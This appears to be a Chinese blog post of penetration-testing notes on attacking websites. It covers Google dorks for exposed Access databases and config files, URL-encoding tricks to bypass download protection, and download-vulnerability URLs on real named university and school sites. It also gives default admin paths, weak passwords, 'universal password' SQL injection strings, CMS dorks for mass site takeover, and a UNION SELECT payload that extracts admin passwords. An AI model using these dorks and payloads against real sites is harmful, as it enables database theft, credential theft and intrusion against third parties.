zoukankan      html  css  js  c++  java
  • 渗透测试学习 七、 漏洞分析

    弱漏洞利用网站

      网站暴库漏洞

        暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL--->数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地,

        hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞)

        利用方法

          inurl:/inc/conn.asp

          inurl:inc+conn.asp to parent directort intext:

          inurl:/inc/conn.asp

          inurl:/inc+conn.asp to parent dirctory

          所有可以目录浏览的网页都有一些相同的地方,主要有以下几点:

          to parent directory

          last madifief Description

          转到父目录

          而利用Google语法来搜索的语句有:

          intitle  intext  inurl  site  filetype等

          搜索域名后缀,常见的域名后缀有:

          com  net  mil  org  info  gov  edu  biz  coop  areo  pro  int  arpa

          e.g

          intext:to parent directory + intext:mdb site:fudan.edu.cn

          inc/conn.asp--->inc%5cconn.asp(MySQL数据库与可能的路径)

        暴库绕过、过防下载

          #sdsf.mdb

          下载时改成 %23sdsf.mdb

          #@!$%^&*asfkladsf@!#.mdb

          %23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb

          高级语法暴库

            inurl:./.. admin ../.. add..

            inurl:./.. admin../..del..

            inurl:/.asp <id=<%<%<%

        下载漏洞

          http://ipo.snnu.edu.cn/

          http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc

          http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc

          http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc

          下载漏洞利用

            通过蜘蛛爬行,找到该URL,下载conn.asp  config.php  config.asp  db.mdb

        网站后台密码爆破(弱口令 bp)

          为了方便管理网站,cms系统畅游管理员后台管理接口,输入账号密码登录进行管理

          常见后台

          网站常见的cms管理系统有:

          织梦  idscuz  帝国  phpweb  WordPress  aspcms  科讯  南方  良精  ecshop等

          对应的后台:

          dede  admin.php  e/admin  admin.php  wp-admin  admin  admin  admin  admin  admin

          还有可能:manager  login_admin  login_manage  login.asp

        弱口令猜解

          常见弱口令:admin  admin888  admin123  123456等等

          逻辑万能秘钥:

          asp--> 'ro' = 'or'

          php--> admin' or 1=1==  admin' or '1'='1

          破解工具:burpsuite  discuz破解器  py脚本  httpfuzzer(针对带验证码的)

          针对性的一些工具:PKav HTTP Fuzzer

          将找到的请求包放进去(请求地址,请求包),对密码部分添加标记,对验证码部分添加标记,然后暴力破解。

        网站漏洞EXP的利用

          EXP是exploit(漏洞利用)的缩写。当我们cms出现漏洞的时候,针对漏洞原理可以写出针对该漏洞的exploit。

          有的时候exp可以直接添加管理员或者getshell,爆出管理员账号密码,数据库账号密码。

          EXP利用

            主流网站基本上都有漏洞和exp

            e.g 织梦  phpcms  strusl  phpweb ...

          EXP收集

            百度  交流  利用工具  

          批量检测站点

            常用于某一类型的漏洞站点的安全检测

          批量拿站

            关键词:

              有限公司 -- powered by AspCMS v2.0

              powered by AspCms 2

              powered by AspCms 2.0

              AspCms 2.0

              powere

            关键字:inurl:newgoods.asp:action_key_order=news

            利用方法:admin_shopxp/upLoad_bm.asp

            漏洞利用:phpweb漏洞

            关键字:

              inurl:/class/?1.html

              inurl:class/index.php?catid=0

              inurl:/page/html/?1.html

              inurl:news/html/?411.htm

              默认后台地址:/admin.php

          注入地址:

            down/class/index.php?myord=1

            news/class/index.php?showtag=

            万能密码  admin 'or '1' =' 1

            织梦批量,搜索关键字:

            powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC

            inurl:shopxp_news.asp

            TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

    2019-04-25  11:02:43      

  • 相关阅读:
    如何制定一周工作计划
    如何评估工作offer(1)
    Iraq shoethrower inspires Web games
    数据加密技术
    数字签名技术原理
    [转载]CSS使用技巧大全
    数字签名介绍
    数字签名原理剖析
    6个有用的MySQL语句
    PGP概述及原理
  • 原文地址:https://www.cnblogs.com/Yuuki-/p/10767096.html
Copyright © 2011-2022 走看看